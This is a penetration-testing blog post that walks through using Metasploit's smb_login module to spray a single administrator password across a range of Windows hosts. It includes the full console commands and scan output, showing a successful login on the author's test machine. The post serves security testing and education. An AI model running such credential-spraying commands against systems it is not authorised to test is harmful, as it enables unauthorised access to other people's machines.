Talk to a Security Expert Now: (800) 721-9177

Testing Windows Passwords with Metasploit

An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test we’ll take the same tactic as well.

Frequently this is accomplished by guessing a password to a users account and then either using the privileges of that account to gain access to critical data or escalating that account to an administrator or root level account. Once credentials have been acquired for one host you’ll want to determine what other systems they work against. It is fairly common to gain access to a local administrator account on a workstation or server for example, but not a domain account and in this case you will want to try that local administrator account against a whole slew of other systems.

There are a number of ways to accomplish this task but one of the most efficient ways is using the smb_login module of Metasploit Framework 4 to test a single username/password combination against a lot of boxes very quickly.

msf > use auxiliary/scanner/smb/smb_login
msf  auxiliary(smb_login) > set smbpass Password!
smbpass => Password!
msf  auxiliary(smb_login) > set smbuser administrator
smbuser => administrator
msf  auxiliary(smb_login) > set user_as_pass false
user_as_pass => false
msf  auxiliary(smb_login) > set rhosts 10.0.0.100-110
rhosts => 10.0.0.100-110
msf  auxiliary(smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RHOSTS            10.0.0.100-110   yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain         WORKGROUP        no        SMB Domain
   SMBPass           Password!        no        SMB Password
   SMBUser           administrator    no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
msf  auxiliary(smb_login) > exploit

[*] 10.0.0.100:445 SMB - Starting SMB login bruteforce
[*] 10.0.0.101:445 SMB - Starting SMB login bruteforce
[*] Scanned 02 of 11 hosts (018% complete)
[*] 10.0.0.102:445 SMB - Starting SMB login bruteforce
[*] Scanned 03 of 11 hosts (027% complete)
[*] 10.0.0.103:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 04 of 11 hosts (036% complete)
[*] 10.0.0.104:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 05 of 11 hosts (045% complete)
[*] 10.0.0.105:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 06 of 11 hosts (054% complete)
[*] 10.0.0.106:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 07 of 11 hosts (063% complete)
[*] 10.0.0.107:445 SMB - [1/2] - Starting SMB login bruteforce
[*] 10.0.0.107:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator :  (STATUS_LOGON_FAILURE)
[+] 10.0.0.107:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!'
[*] Scanned 08 of 11 hosts (072% complete)
[*] 10.0.0.108:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 09 of 11 hosts (081% complete)
[*] 10.0.0.109:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 10 of 11 hosts (090% complete)
[*] 10.0.0.110:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(smb_login) >

In this example I successfully compromised one of my test systems that was using the password ‘Password!’ for the local administrator account. This may seem far fetched, but I’ve seen worse than this before on engagements.

Be aware that this type of activity is very noisy and easily detectable by a sysadmin or security goon, as it will create a failed login attempt for the Administrator account on every machine in the subnet.

Leave a Reply

Your email address will not be published. Required fields are marked *